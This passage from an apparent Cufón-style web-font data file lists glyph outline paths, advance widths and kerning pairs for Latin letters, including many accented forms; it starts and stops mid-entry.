,23,21,71,66,69r0,29r-72,0r-47,-88r-20,0v4,25,-14,65,24,59r0,29r-104,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29xm147,-154v0,-33,-16,-42,-49,-39r0,76v33,3,49,-9,49,-37","w":243,"k":{"v":9}},{"d":"150,-45v0,46,-75,66,-109,35r-3,10r-20,0r0,-66v15,0,29,-3,28,16v-1,25,48,35,53,11v3,-14,-30,-22,-43,-27v-23,-10,-40,-24,-40,-52v0,-48,73,-67,103,-38r2,-9r20,0r0,65v-17,1,-28,0,-27,-18v1,-26,-45,-29,-47,-7v-1,15,33,23,46,30v22,11,37,24,37,50xm118,-194v-23,0,-46,3,-67,14r-8,-7v19,-22,37,-37,57,-37v16,0,20,13,18,30","w":160},{"d":"88,-151v40,-35,101,-22,101,36r0,80v0,11,9,10,19,10r0,25r-90,0r0,-25r16,0r0,-88v0,-29,-33,-22,-46,-8r0,86v-1,11,7,10,17,10r0,25r-91,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v13,-1,15,5,14,16xm148,-194v-23,0,-47,3,-68,14r-8,-8v19,-22,38,-37,58,-37v17,0,19,13,18,31","w":217},{"d":"130,-209v-20,-5,-52,-11,-51,17v0,7,4,22,6,27r36,0r5,25r-38,0r0,105v-1,11,9,10,19,10r0,25r-93,0r0,-25r18,0r0,-115r-24,0r0,-25r20,0v-13,-45,7,-84,57,-84v18,0,37,5,45,8r0,32","w":131,"k":{"v":-2}},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25xm150,-208v0,10,-9,17,-19,17v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18v10,0,19,8,19,18xm95,-208v0,10,-9,17,-19,17v-10,0,-18,-7,-18,-17v0,-10,8,-18,18,-18v10,0,19,8,19,18","w":216},{"d":"103,-213v-37,-2,-15,41,-15,65r0,113v-1,11,9,10,19,10r0,25r-93,0r0,-25r18,0r0,-115r-24,0r0,-25r20,0v-13,-45,7,-84,57,-84v18,0,37,5,45,8r0,32v-8,-3,-18,-4,-27,-4","w":121},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25","w":216},{"d":"197,0r-179,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-1,28,41,10,63,15v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm104,-254v-23,0,-47,3,-68,14r-8,-7v19,-22,38,-37,58,-37v16,0,20,13,18,30","w":212},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29xm92,-262v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":138},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25xm142,-194v-23,0,-46,3,-67,14r-8,-8v19,-22,38,-37,58,-37v17,0,18,14,17,31","w":216},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25xm161,-228v-3,17,-10,36,-36,36v-19,0,-40,-21,-51,0r-19,0v4,-23,16,-36,35,-36v21,0,42,22,53,0r18,0","w":216},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14xm125,-206v0,18,-16,30,-33,30v-17,0,-32,-12,-32,-30v0,-18,15,-30,32,-30v17,0,33,12,33,30xm106,-206v0,-10,-5,-16,-14,-16v-9,0,-14,6,-14,16v0,10,5,16,14,16v9,0,14,-6,14,-16xm126,-253v-23,0,-46,3,-67,14r-8,-7v19,-22,37,-37,57,-37v16,0,20,13,18,30","w":185},{"d":"179,-82v0,59,-35,87,-84,87v-49,0,-83,-28,-83,-87v0,-59,34,-88,83,-88v49,0,84,29,84,88xm121,-82v0,-35,-7,-53,-26,-53v-19,0,-26,18,-26,53v0,35,7,52,26,52v19,0,26,-17,26,-52xm140,-208v0,10,-8,17,-18,17v-10,0,-18,-7,-18,-17v0,-10,8,-18,18,-18v10,0,18,8,18,18xm85,-208v0,10,-9,17,-19,17v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18v10,0,19,8,19,18","w":190},{"d":"69,-82v0,32,8,52,37,53v15,0,32,-7,40,-13r14,24v-12,11,-38,23,-64,23v-54,0,-84,-34,-84,-87v0,-75,71,-109,122,-74r2,-9r20,0r0,67v-18,2,-29,-1,-29,-20v0,-14,-12,-20,-24,-20v-28,2,-34,25,-34,56xm138,-226v-15,15,-31,58,-63,36r-30,-36v26,-4,35,9,47,19v13,-9,21,-23,46,-19","w":174},{"d":"55,-177v0,14,-10,23,-23,23v-14,0,-25,-10,-25,-26v0,-19,10,-42,30,-72r13,7v-8,14,-15,36,-16,47v13,1,21,11,21,21","w":64},{"d":"69,-82v0,32,8,52,37,53v15,0,32,-7,40,-13r14,24v-12,11,-38,23,-64,23v-54,0,-84,-34,-84,-87v0,-75,71,-109,122,-74r2,-9r20,0r0,67v-18,2,-29,-1,-29,-20v0,-14,-12,-20,-24,-20v-28,2,-34,25,-34,56","w":174},{"d":"162,0r-148,0v-1,-16,2,-26,9,-35r77,-103v-25,1,-58,-9,-55,25r-28,0r0,-52r144,0v1,18,-1,27,-11,40r-73,98v25,-2,61,10,57,-25r28,0r0,52xm114,-206v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":176},{"d":"68,-120r-47,0r0,-125r47,0r0,125xm68,72r-47,0r0,-125r47,0r0,125","w":89},{"d":"180,-82v1,69,-50,98,-111,83r-10,21r-26,0r14,-30v-21,-14,-34,-38,-34,-74v-1,-70,49,-99,111,-84r12,-27r26,0r-17,36v22,14,35,39,35,75xm107,-132v-26,-11,-37,10,-36,50v0,9,0,17,1,23xm85,-32v37,16,39,-38,36,-75xm126,-194v-23,0,-46,3,-67,14r-8,-8v19,-22,37,-37,57,-37v17,0,19,13,18,31","w":190},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29xm122,-281v-3,17,-10,36,-36,36v-19,0,-40,-21,-51,0r-18,0v4,-43,43,-38,72,-26v8,0,13,-5,15,-10r18,0","w":138},{"d":"126,-142v-20,25,-35,-7,-51,-22v6,23,27,51,-6,55v-32,-4,-10,-33,-5,-56v-17,14,-30,50,-52,23v-12,-28,22,-26,45,-33v-23,-7,-57,-4,-45,-33v22,-25,35,10,51,23v-5,-24,-25,-51,6,-55v33,4,12,32,6,55v17,-15,30,-47,51,-23v13,29,-22,27,-45,33v23,7,58,3,45,33","w":138},{"d":"198,0r-180,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm146,-247r-8,7v-21,-11,-44,-14,-67,-14v-1,-17,2,-30,18,-30v20,0,38,15,57,37","w":219},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25xm140,-206v0,18,-15,30,-32,30v-17,0,-32,-12,-32,-30v0,-18,15,-30,32,-30v17,0,32,12,32,30xm122,-206v0,-10,-5,-16,-14,-16v-9,0,-14,6,-14,16v0,10,5,16,14,16v9,0,14,-6,14,-16","w":216},{"d":"159,-182v-44,-28,-81,17,-81,71v0,70,26,88,70,73v-2,-20,9,-47,-21,-41r0,-29r97,0r0,29r-17,0r0,79r-41,0r-5,-10v-65,33,-144,10,-144,-99v0,-91,94,-149,158,-97r3,-16r25,0r0,81v-19,2,-32,0,-32,-20v-2,-9,-5,-17,-12,-21xm167,-238v-26,4,-35,-9,-47,-19v-13,9,-21,23,-46,19v16,-16,31,-58,64,-36","w":240,"k":{"v":6,"w":6,"y":4}},{"d":"69,-82v0,32,8,52,37,53v15,0,32,-7,40,-13r14,24v-12,11,-38,23,-64,23v-54,0,-84,-34,-84,-87v0,-75,71,-109,122,-74r2,-9r20,0r0,67v-18,2,-29,-1,-29,-20v0,-14,-12,-20,-24,-20v-28,2,-34,25,-34,56xm137,-184v-26,4,-35,-9,-47,-19v-13,9,-21,23,-46,19v16,-16,31,-58,64,-36","w":174},{"d":"162,0r-148,0v-1,-16,2,-26,9,-35r77,-103v-25,1,-58,-9,-55,25r-28,0r0,-52r144,0v1,18,-1,27,-11,40r-73,98v25,-2,61,10,57,-25r28,0r0,52xm136,-226v-15,15,-31,58,-63,36r-29,-36v25,-4,34,10,46,19v13,-9,21,-23,46,-19","w":176},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14xm125,-206v0,18,-15,30,-32,30v-17,0,-33,-12,-33,-30v0,-18,16,-30,33,-30v17,0,32,12,32,30xm109,-206v0,-12,-6,-19,-16,-19v-10,0,-17,7,-17,19v0,12,7,19,17,19v10,0,16,-7,16,-19","w":185},{"d":"80,-140v3,46,-18,130,45,106r0,31v-9,3,-25,7,-43,7v-70,0,-56,-77,-57,-144r-21,0r0,-25r21,0v0,0,-3,-35,15,-37r40,-6r0,43r34,0r5,25r-39,0xm87,39v0,17,-8,33,-26,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,21,8,21,22","w":132},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r75,-193r39,0r69,179v5,12,12,15,27,14r0,29xm128,-93r-21,-62r-23,62r44,0xm163,-273v-2,20,-20,36,-46,36v-26,0,-44,-14,-47,-36r22,0v2,18,48,18,49,0r22,0","w":236,"k":{"y":7,"w":17,"v":17,"c":1,"V":33,"U":10,"Q":3,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22}},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29xm102,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,38,-37,58,-37v16,0,18,13,17,30","w":138},{"d":"91,-82r-67,0r0,-18r15,0r0,-94r-20,0r-3,-18v28,-1,33,-13,59,-10r0,113v-1,9,7,10,16,9r0,18","w":106},{"d":"86,-151v41,-34,102,-22,102,36r0,80v-1,12,9,10,19,10r0,25r-90,0r0,-25r15,0r0,-88v1,-29,-33,-21,-46,-8r0,86v0,11,9,10,19,10r0,25r-93,0r0,-25r19,0r0,-195r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,86xm102,-259v-25,4,-34,-10,-46,-19v-13,9,-21,23,-47,19v16,-15,32,-58,64,-36","w":215},{"d":"198,0r-180,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm151,-256v0,10,-9,18,-19,18v-10,0,-18,-8,-18,-18v0,-10,8,-18,18,-18v10,0,19,8,19,18xm95,-256v0,10,-8,18,-18,18v-10,0,-18,-8,-18,-18v0,-10,8,-18,18,-18v10,0,18,8,18,18","w":219},{"d":"125,-165v0,41,-24,61,-59,61v-35,0,-58,-20,-58,-61v0,-41,23,-61,58,-61v35,0,59,20,59,61xm84,-165v0,-24,-5,-37,-18,-37v-13,0,-18,13,-18,37v0,24,5,37,18,37v13,0,18,-13,18,-37","w":132},{"d":"162,0r-148,0v-1,-16,2,-26,9,-35r77,-103v-25,1,-58,-9,-55,25r-28,0r0,-52r144,0v1,18,-1,27,-11,40r-73,98v25,-2,61,10,57,-25r28,0r0,52xm129,-194v-23,0,-46,3,-67,14r-8,-8v19,-22,37,-37,57,-37v17,0,19,13,18,31","w":176},{"d":"90,-217v0,18,-14,28,-31,28v-17,0,-31,-10,-31,-28v0,-18,14,-29,31,-29v17,0,31,11,31,29xm108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25xm204,-217v0,18,-13,28,-30,28v-17,0,-31,-10,-31,-28v0,-18,14,-29,31,-29v17,0,30,11,30,29xm207,3v7,65,-52,77,-105,60r0,-32v20,7,50,12,50,-19r0,-152r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,160","w":236},{"d":"131,-14v-40,35,-101,22,-101,-36r0,-90r-22,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v0,29,33,22,46,8r0,-96r-18,0r0,-25r91,0r5,25v-13,-1,-23,0,-23,14v-2,100,23,212,-87,207v-18,0,-38,-3,-50,-7r0,-35v34,12,87,16,82,-31r0,-22xm144,-194v-23,0,-46,3,-67,14r-8,-8v19,-22,37,-37,57,-37v17,0,19,13,18,31","w":214},{"d":"163,73v-47,0,-61,-58,-24,-73v-12,0,-23,-4,-27,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25v-29,-4,-46,48,-13,51v6,0,14,-2,16,-3r0,21v-5,3,-12,4,-20,4xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14","w":185},{"d":"217,-111v0,73,-45,129,-126,112v-9,17,-4,30,24,30v30,0,59,-13,81,-17r0,34v-56,19,-159,38,-159,-30v0,-13,7,-26,16,-35v-65,-61,-44,-209,64,-209v69,0,100,51,100,115xm155,-111v0,-24,-4,-75,-38,-75v-34,0,-38,51,-38,75v0,24,4,75,38,75v34,0,38,-51,38,-75","w":234},{"d":"180,-148v32,-33,108,-31,108,33r0,80v-1,12,9,10,19,10r0,25r-90,0r0,-25r16,0r0,-88v-1,-28,-31,-23,-45,-8r0,86v-1,11,7,10,17,10r0,25r-88,0r0,-25r15,0r0,-88v0,-29,-31,-22,-44,-8r0,86v-1,11,7,10,17,10r0,25r-91,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v13,-1,15,5,14,16v31,-26,72,-26,92,3","w":315},{"d":"131,-14v-40,35,-101,22,-101,-36r0,-90r-22,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v0,29,33,22,46,8r0,-96r-18,0r0,-25r91,0r5,25v-13,-1,-23,0,-23,14v-2,100,23,212,-87,207v-18,0,-38,-3,-50,-7r0,-35v34,12,87,16,82,-31r0,-22xm150,-208v0,10,-9,17,-19,17v-10,0,-18,-7,-18,-17v0,-10,8,-18,18,-18v10,0,19,8,19,18xm94,-208v0,10,-8,17,-18,17v-10,0,-18,-7,-18,-17v0,-10,8,-18,18,-18v10,0,18,8,18,18","w":214},{"d":"208,0r-91,0r0,-25r12,0r-29,-53r-14,12v2,19,-9,46,19,41r0,25r-93,0r0,-25r19,0r0,-195r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,133v19,-17,52,-40,61,-61r49,0r0,25v-29,-5,-42,15,-58,29r40,72v8,13,15,14,30,14r0,25","w":213},{"d":"57,-226v0,19,-9,42,-29,72r-14,-7v8,-14,16,-36,17,-47v-13,-1,-21,-11,-21,-21v0,-14,10,-23,23,-23v14,0,24,10,24,26","w":64},{"d":"124,0r-104,0r0,-29r20,0r0,-149v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-2,14,10,16,25,15r0,29xm116,-273v-2,20,-21,36,-47,36v-26,0,-43,-14,-46,-36r22,0v2,18,48,18,49,0r22,0","w":138},{"d":"132,69r-103,0r0,-315r103,0r0,34r-45,0r0,248r45,0r0,33","w":118},{"d":"108,0r-93,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25xm91,-194v-23,0,-47,3,-68,14r-8,-8v19,-22,38,-37,58,-37v17,0,19,13,18,31","w":118},{"d":"114,-151v40,-35,101,-22,101,36r0,80v0,11,9,10,19,10r0,25r-90,0r0,-25r16,0r0,-88v0,-29,-33,-22,-46,-8r0,86v-1,11,7,10,17,10r0,25r-91,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v13,-1,15,5,14,16xm37,-226v0,19,-10,42,-30,72r-13,-7v8,-14,15,-36,16,-47v-13,-1,-21,-11,-21,-21v0,-14,10,-23,23,-23v14,0,25,10,25,26","w":243},{"d":"94,-170v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29r15,24v-15,14,-43,25,-70,25v-53,0,-83,-35,-83,-87v0,-50,33,-88,84,-88xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm139,-226v-15,16,-32,58,-64,36r-29,-36v26,-4,34,10,47,19v13,-9,21,-23,46,-19","w":182},{"d":"197,0r-179,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0r0,149v-1,28,41,10,63,15v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74xm166,-119v0,13,-10,23,-23,23v-13,0,-22,-10,-22,-23v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":212,"k":{"y":5,"w":6,"v":6,"V":28,"U":6,"u":5,"\u00f9":5,"\u00fa":5,"\u00fb":5,"\u0169":5,"\u00fc":5,"\u016b":5,"\u016d":5,"\u016f":5,"\u0171":5,"\u0173":5,"W":28,"\u0174":28,"Y":20,"\u00dd":20,"\u0176":20,"\u0178":20}},{"d":"12,-248v120,42,120,284,0,326r-11,-16v56,-34,55,-260,0,-294","w":119},{"d":"180,0v-26,-1,-59,6,-68,-13v-27,27,-100,26,-100,-35v0,-38,37,-59,90,-60v3,-44,-39,-35,-75,-21r0,-30v53,-19,130,-20,130,51r0,73v-1,12,12,10,23,10r0,25xm102,-39r0,-44v-24,1,-38,14,-38,30v0,21,27,25,38,14xm126,-194v-23,0,-46,3,-67,14r-8,-8v19,-22,37,-37,57,-37v17,0,19,13,18,31","w":185},{"d":"138,-173v0,48,-49,54,-62,110r-24,0v3,-58,29,-74,29,-105v0,-33,-42,-25,-66,-16r0,-33v45,-20,123,-6,123,44xm87,-18v0,13,-10,22,-23,22v-13,0,-23,-9,-23,-22v0,-13,10,-23,23,-23v13,0,23,10,23,23","w":149},{"d":"80,-140v3,46,-18,130,45,106r0,31v-9,3,-25,7,-43,7v-70,0,-56,-77,-57,-144r-21,0r0,-25r21,0v0,0,-3,-35,15,-37r40,-6r0,43r34,0r5,25r-39,0","w":132},{"d":"163,-20v-14,19,-42,26,-44,53v-1,18,19,22,34,15r0,21v-27,11,-67,0,-65,-33v0,-13,6,-24,16,-32v-58,7,-95,-31,-94,-86v0,-50,33,-88,84,-88v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0","w":182},{"d":"88,-151v40,-35,101,-22,101,36r0,80v0,11,9,10,19,10r0,25r-90,0r0,-25r16,0r0,-88v0,-29,-33,-22,-46,-8r0,86v-1,11,7,10,17,10r0,25r-91,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v13,-1,15,5,14,16xm160,-226v-16,16,-31,58,-64,36r-29,-36v26,-4,35,9,47,19v13,-9,21,-23,46,-19","w":217},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160xm177,-281v-3,17,-10,36,-36,36v-19,0,-41,-21,-51,0r-19,0v4,-43,44,-38,72,-26v8,0,13,-5,15,-10r19,0","w":248},{"d":"17,-111v0,-83,74,-145,141,-99r2,-12r26,0r0,82v-12,0,-28,3,-30,-9v-3,-20,-6,-39,-33,-40v-26,0,-45,21,-45,75v0,85,56,98,95,59r20,23v-15,18,-44,36,-78,36v-60,0,-98,-42,-98,-115xm135,-262v0,13,-10,22,-23,22v-13,0,-22,-9,-22,-22v0,-13,9,-22,22,-22v13,0,23,9,23,22","w":209},{"d":"88,-151v40,-35,101,-22,101,36r0,80v0,11,9,10,19,10r0,25r-90,0r0,-25r16,0r0,-88v0,-29,-33,-22,-46,-8r0,86v-1,11,7,10,17,10r0,25r-91,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v13,-1,15,5,14,16xm132,39v0,17,-8,33,-26,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,21,8,21,22","w":217},{"d":"210,0v-28,-2,-63,7,-69,-17v-30,31,-111,34,-111,-32r0,-91r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,105v-1,28,34,22,46,8r0,-96r-22,0r-5,-25v34,0,56,-2,69,-2v10,0,13,2,13,10r0,120v-1,12,11,13,23,12r0,25xm149,-184v-25,4,-34,-10,-46,-19v-13,9,-21,23,-46,19v15,-15,31,-58,63,-36","w":216},{"d":"127,-33v52,0,23,-95,30,-145v2,-15,-10,-16,-25,-15r0,-29r100,0r0,29r-20,0r0,109v2,55,-30,88,-87,88v-56,0,-88,-32,-88,-86r0,-96v2,-14,-10,-16,-25,-15r0,-29r104,0r0,29r-20,0v7,55,-22,160,31,160xm171,-273v-2,20,-21,36,-47,36v-26,0,-43,-14,-46,-36r22,0v2,18,48,18,49,0r22,0","w":248},{"d":"153,0r-135,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r177,0r3,83v-13,0,-27,1,-28,-11v-5,-18,1,-43,-25,-43r-43,0r0,68r25,0v2,-16,5,-30,27,-25r0,77v-12,-1,-22,4,-24,-9r-3,-16r-25,0v4,23,-12,69,15,69r49,0v5,-16,8,-41,8,-58v14,0,28,-3,28,13r0,74v-33,-9,-51,46,-18,51v6,0,15,-2,17,-3r0,21v-28,11,-67,-1,-66,-34v0,-14,7,-29,22,-35","w":219},{"d":"94,-170v53,0,80,44,74,97r-100,0v-2,50,51,53,80,29r15,24v-15,14,-43,25,-70,25v-53,0,-83,-35,-83,-87v0,-50,33,-88,84,-88xm116,-98v0,-19,1,-41,-21,-41v-20,0,-25,26,-26,41r47,0xm140,-208v0,10,-9,17,-19,17v-10,0,-17,-7,-17,-17v0,-10,7,-18,17,-18v10,0,19,8,19,18xm85,-208v0,10,-9,17,-19,17v-10,0,-18,-7,-18,-17v0,-10,8,-18,18,-18v10,0,19,8,19,18","w":182},{"d":"208,0r-91,0r0,-25r12,0r-29,-53r-14,12v2,19,-9,46,19,41r0,25r-93,0r0,-25r19,0r0,-195r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,133v19,-17,52,-40,61,-61r49,0r0,25v-29,-5,-42,15,-58,29r40,72v8,13,15,14,30,14r0,25xm132,39v0,17,-8,33,-26,59r-12,-7v7,-12,14,-27,15,-37v-12,0,-19,-9,-19,-18v0,-12,9,-19,21,-19v12,0,21,8,21,22","w":213},{"d":"91,3v7,65,-52,77,-105,60r0,-32v20,7,49,12,49,-19r0,-152r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,160xm105,-184v-25,4,-34,-10,-46,-19v-13,9,-21,23,-46,19v15,-15,31,-58,63,-36","w":119},{"d":"105,0r-93,0r0,-25r19,0r0,-195r-22,0r-5,-26v34,0,56,-2,69,-2v10,0,13,3,13,11r0,202v0,11,9,10,19,10r0,25","w":115},{"d":"75,-205v0,-17,8,-33,26,-59r12,7v-7,12,-14,27,-15,37v12,0,19,9,19,18v0,12,-9,19,-21,19v-12,0,-21,-8,-21,-22xm185,25v0,28,-24,57,-90,57v-66,0,-113,-54,-59,-81v-18,-14,-15,-42,3,-58v-43,-47,-1,-131,76,-111v15,-23,32,-31,47,-31v18,0,17,14,17,30v-11,0,-24,0,-38,10v55,29,34,122,-44,122v-12,0,-24,-2,-33,-5v-6,15,1,17,27,17v52,0,94,7,94,50xm117,-103v0,-22,-5,-37,-20,-37v-15,0,-20,15,-20,37v0,22,5,36,20,36v15,0,20,-14,20,-36xm138,30v5,-23,-62,-10,-76,-16v-13,19,10,35,36,35v27,0,40,-10,40,-19","w":195},{"d":"231,-47v0,46,-72,69,-105,36r-3,11r-19,0r0,-67v17,-1,29,0,27,19v-2,27,51,31,52,6v0,-32,-72,-24,-72,-81v0,-36,35,-42,35,-67v0,-17,-10,-26,-27,-26v-27,0,-31,24,-31,46r0,170r-74,0r0,-25r18,0r0,-115r-24,0r0,-25r23,0v-2,-56,34,-84,86,-84v33,0,79,16,79,56v0,31,-37,41,-37,60v0,31,72,23,72,86","w":241},{"d":"108,0v-28,-3,-47,7,-48,32v-1,20,22,22,35,16r0,21v-28,11,-67,-1,-66,-34v0,-14,7,-29,22,-35r-36,0r0,-25r18,0r0,-115r-21,0r-5,-25v34,0,55,-2,68,-2v10,0,14,2,14,10r0,122v-1,12,9,10,19,10r0,25xm90,-217v0,18,-14,28,-31,28v-17,0,-31,-10,-31,-28v0,-18,14,-29,31,-29v17,0,31,11,31,29","w":118},{"d":"157,-246r-123,268r-49,0r123,-268r49,0","w":141},{"d":"233,0r-101,0r0,-29r17,0r-12,-38r-63,0r-11,31v0,9,12,7,21,7r0,29r-82,0r0,-29r21,0r75,-193r39,0r69,179v5,12,12,15,27,14r0,29xm128,-93r-21,-62r-23,62r44,0xm164,-256v0,10,-9,18,-19,18v-10,0,-18,-8,-18,-18v0,-10,8,-18,18,-18v10,0,19,8,19,18xm108,-256v0,10,-8,18,-18,18v-10,0,-18,-8,-18,-18v0,-10,8,-18,18,-18v10,0,18,8,18,18","w":236,"k":{"v":17,"Q":3,"U":10,"V":33,"c":1,"w":17,"y":7,"u":7,"\u00f9":7,"\u00fa":7,"\u00fb":7,"\u0169":7,"\u00fc":7,"\u016b":7,"\u016d":7,"\u016f":7,"\u0171":7,"\u0173":7,"C":4,"\u0106":4,"\u00c7":4,"\u0108":4,"\u010c":4,"\u010a":4,"G":5,"\u011c":5,"\u011e":5,"\u0120":5,"\u0122":5,"O":3,"\u00d2":3,"\u00d3":3,"\u00d4":3,"\u00d5":3,"\u00d6":3,"\u014c":3,"\u014e":3,"\u0150":3,"\u00d8":3,"\u01fe":3,"\u0152":3,"T":22,"\u0164":22,"\u0162":22,"W":32,"\u0174":32,"Y":32,"\u00dd":32,"\u0176":32,"\u0178":32,"e":1,"\u00e8":1,"\u00e9":1,"\u00ea":1,"\u011b":1,"\u00eb":1,"\u0113":1,"\u0115":1,"\u0117":1,"\u0119":1}},{"d":"236,-193r-20,0r0,193r-32,0r-105,-131r0,87v-2,14,10,16,25,15r0,29r-86,0r0,-29r21,0r0,-149v1,-13,-10,-16,-25,-15r0,-29r55,0r106,129r0,-85v2,-15,-10,-16,-25,-15r0,-29r86,0r0,29xm163,-254v-23,0,-46,3,-67,14r-8,-7v19,-22,